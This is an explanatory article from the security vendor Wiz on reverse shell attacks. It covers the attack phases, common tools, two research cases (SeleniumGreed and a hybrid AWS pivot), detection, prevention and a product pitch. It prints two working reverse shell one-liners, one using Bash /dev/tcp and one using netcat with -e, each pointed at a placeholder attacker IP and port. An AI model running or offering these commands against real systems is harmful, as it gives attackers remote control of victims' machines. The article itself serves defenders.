A reverse shell attack is a type of cyberattack where a compromised machine is forced to initiate an unauthorized remote connection back to an attacker-controlled system. This technique bypasses traditional firewall protections because the connection appears as legitimate outbound traffic from the compromised host. Attackers typically use TCP protocols, though ICMP and UDP variants exist for specific scenarios.
With control of a victim's machine and communications, the attacker can steal or modify data, inject malware, or further escalate their access within the victim's network. This is a widespread threat, with government agencies reporting activity across multiple countries, including the US, UK, Canada, and Australia. And the stakes are high: public disclosure of the attack can lead to loss of customer trust, negative media attention, diminished brand reputation, regulatory fines, and revenue loss.
Get the Wiz Research Guide to MCP Security
A practical breakdown of the security risks in the Model Context Protocol, from supply chain vulnerabilities and prompt injection to remote server exposure.
Let's explore reverse shell attacks in more detail and discuss proactive measures you can take to protect your organization.
How does a reverse shell work?
Reverse shell attacks exploit command injection vulnerabilities. The attack unfolds through three distinct phases that transform initial access into persistent control: connection initiation, reverse shell, and command injection.
Connection initiation. Attackers compromise target systems by remote code execution that exploits system vulnerabilities, like port forwarding and open ports. Because firewall rules are easier to bypass on open ports, attackers can gain access through ports such as port 80 or 443, which are often open by default.
Reverse shell. Attackers then deploy a payload that establishes a connection from the vulnerable machine to a remote machine. The attacker's remote systems listen and accept the request, allowing them administrative access to exploit victims' systems. Since the connection is outgoing, security mechanisms that detect only incoming connections can be bypassed. (This is an important difference between reverse shell and bind shell. Unlike reverse shell, bind shell may be easier to discover, as the connection is initiated by the attacker's system.)
Command injection. To maintain persistent access, attackers bypass network filtering through port forwarding. Attackers may also use proxy servers or tunneling techniques to obscure the origin of their connection. To conceal malicious communication, attackers use encryption, but this adds an extra handshake to the process, which makes it even harder to detect the communication flow.
What are common reverse shell tools and methods?
Attackers use a range of tools and programming languages to create reverse shells, each with its own strengths and detection challenges. Some of the most common tools include:
Netcat, which is widely used for its simplicity and flexibility
Socat, which supports encrypted connections and advanced tunneling
Attackers also leverage built-in scripting languages like Bash, Python, Perl, PHP, and Ruby to craft custom reverse shell payloads that blend in with legitimate processes.
In Windows environments, PowerShell and cmd.exe are often used to establish reverse shells, sometimes in combination with tools like msfvenom or Metasploit for payload generation. Understanding these tools and methods helps defenders recognize suspicious activity and block common attack paths before they’re exploited.
Examples of reverse shell methods
Multiple programming languages enable reverse shell implementations, each with distinct syntax but similar underlying mechanics. Understanding these variations helps security teams recognize attack patterns across different environments.
Bash reverse shell: Bash reverse shell is a Unix shell that is carried out using a simple one-line command. For example:
```bash
bash -i >& /dev/tcp/attackers_ip/attackers_port 0>&1In this command, “/dev/tcp/attackers_ip/attackers_port” represents the IP address and port number the reverse shell will connect to.
Java reverse shell: Java reverse shells are implemented using libraries such as java.net.Socket. This attack involves establishing a socket connection to the threat actor's server to enable remote command execution.
Netcat reverse shell: A Netcat reverse shell might look like:
nc -e /bin/sh attackers_ip attackers_portIn this command, Netcat executes a shell connection to the specified IP address and port to establish a reverse shell.
Perl reverse shell: The IO::Socket module is commonly used to initiate a Perl reverse shell connection, enabling bidirectional communication between victims' and attackers' systems.
PHP reverse shell: For PHP reverse shells, the attacker uses PHP's socket functions (open and exec) to open a connection from a victim's system to their system. The threat actor then executes commands to redirect communication to their system.
Python reverse shell: Python provides robust networking capabilities, making it well-suited to creating reverse shell connections. A Python reverse shell involves using the "socket" library to create a socket connection.
Ruby reverse shell: A Ruby reverse shell attack involves creating a socket connection to the attacker's server and establishing bidirectional communication for executing commands in a victim's system.
PyLoose: Python-based fileless malware targets cloud workloads to deliver cryptominer
Read more
Real-world examples of reverse shell attacks
Reverse shells are rarely the "end game"—they are the essential bridge that allows attackers to maintain a foothold and move laterally through an environment. Whether they are gaining entry through a misconfigured service or a compromised personal device, attackers use these connections to bypass firewalls and execute commands as if they were sitting at the internal console.
In modern cloud environments, the impact of a reverse shell is amplified by the interconnected nature of services. A single persistent connection can lead to massive resource hijacking or provide a permanent "backdoor" into production environments.
Let's consider two real-life scenarios:
1. #SeleniumGreed: Ongoing cryptomining campaign targeting Selenium Grid
The Wiz Research team uncovered an active threat campaign, dubbed "#SeleniumGreed," that exploits exposed Selenium Grid services to deploy cryptominers. Selenium is one of the most popular web testing frameworks, found in approximately 30% of cloud environments, but many instances are inadvertently left exposed to the internet without authentication.
By leveraging the Selenium WebDriver API, threat actors can execute remote commands and deploy a reverse shell to install a modified XMRig miner. To remain undetected, the attackers employed sophisticated evasion tactics like "timestomping" (altering file timestamps) and using other compromised Selenium nodes as C2 servers to host their payloads.
2. The Hybrid Pivot: From a home office to the AWS production cloud
Wiz researchers analyzed a sophisticated, multi-year hybrid attack where threat actors successfully pivoted from a personal device to a sensitive AWS production environment. The attack began with a social engineering campaign targeting a DevOps employee’s home computer, which the attackers used as a beachhead to compromise a corporate jump server.
Once inside, the attackers moved laterally into the cloud, gaining access to a highly privileged IAM user. This allowed them to modify RDS database audit policies and exfiltrate sensitive data. Even after the organization rotated credentials, the attackers maintained persistence through the compromised on-premises jump server, waiting for the new credentials to be used before striking again—underscoring the critical need for unified visibility across hybrid infrastructure.
How to detect reverse shell attacks
Detecting reverse shell attacks requires monitoring for unusual outbound connections, especially those targeting unfamiliar external IP addresses or ports. Security teams should look for processes that spawn network connections unexpectedly, such as shells or scripting engines making outbound TCP connections.
Traditional firewalls fail against reverse shells because these attacks use legitimate outbound connections that appear normal to perimeter security, but additional security measures can help cover your bases:
Advanced firewalls with eBPF capabilities monitor outbound traffic patterns and detect suspicious connection behaviors.
Intrusion detection systems (IDS) complement firewall controls by analyzing traffic content and timing patterns. They identify unusual outbound connections to known malicious infrastructure and alert on command-and-control communication patterns typical of reverse shell activity.
Centralized log analysis and behavioral monitoring can help identify patterns that deviate from normal activity, such as command-line tools running with network privileges or connections initiated from service accounts. Advanced detection solutions, like Wiz Defend, use behavioral analytics to correlate process activity, network flows, and cloud context, making it easier to spot reverse shell attempts even when attackers use encryption or obfuscation techniques.
Watch 5-Minute Demo
See how Wiz Defend detects reverse shell patterns across cloud workloads using behavioral analytics and network monitoring.
How to prevent reverse shell attacks
Preventing reverse shells requires a defense-in-depth strategy that limits an attacker's ability to initiate outbound connections. Follow these steps to protect your environment from initial access to execution:
1. Harden your infrastructure
Enforce Least Privilege: Restrict outbound connections from sensitive workloads. If a database doesn't need to talk to the open internet, block it.
Network Segmentation: Use micro-segmentation to ensure that even if one container is compromised, the "shell" cannot reach a C2 server.
Audit for Injection: Regularly scan for command injection vulnerabilities—the primary entry point for reverse shell payloads.
2. Secure the software supply chain
Attackers are increasingly embedding reverse shells into malicious npm or PyPI packages that execute immediately upon installation.
Implement SCA: Software Composition Analysis (SCA) tools are essential for scanning dependencies in your CI/CD pipeline to catch "poisoned" packages before they reach production.
Secrets management: According to Wiz’s 2025 State of Code Security Report, 61% of organizations have exposed secrets in public repos. Secure your credentials to prevent attackers from using them to amplify supply chain breaches.
3. Master the fundamentals
Automated patch management is your best defense. Every unpatched API or web app is an open door for an attacker to inject a reverse shell.
Automated patching: Shrink the window of exploitation by automating updates for high-risk vulnerabilities.
Validation: Use penetration testing to see if vulnerabilities can be chained together to achieve remote access.
4. Contain the breach (blast radius mitigation)
Once an attacker gains a foothold, host-based security controls are your final line of defense to stop lateral movement.
Container isolation: Implement strict isolation to prevent a reverse shell from "jumping" between workloads. Proper sandboxing ensures that a breach in one container doesn't compromise the entire cluster.
Egress allow-lists: Don't just monitor outbound traffic—restrict it. Use allow-lists to specify exactly which external domains and IP addresses your systems are permitted to contact.
Integrity monitoring: Watch for unauthorized changes to firewall or proxy rules. In a cloud environment, these modifications are often the first "red flags" of a successful reverse shell connection.
Protect your organization from reverse shell attacks with Wiz ASM
Wiz detects and prevents reverse shell attacks using its runtime sensors (Wiz Sensor) and Wiz Defend platform by focusing on deep process-level anomalies, real-time runtime monitoring, and cloud control plane activity.
Key Insights:
Wiz Sensor identifies reverse shells by detecting processes where standard input is mapped to a socket (MITRE ATT&CK T1059.004) and identifying descendant processes of suspected remote shells.
Wiz Defend provides real-time runtime detection across MITRE tactics, processes, and cloud control plane activity, using behavioral analytics to correlate activity and spot obfuscated reverse shell attempts.
Wiz validates detection capabilities through live attack simulations for both Linux and Windows environments, demonstrating its effectiveness against C2 communication.
Detection can be impacted if the attacker's C2 connection for the reverse shell is not reachable.
Don’t let a hidden vulnerability become an attacker's entry point. Request a demo to see how Wiz can help you secure your environment against reverse shell attacks and other advanced threats.
See for yourself...
Learn what makes Wiz the platform to enable your cloud security operation
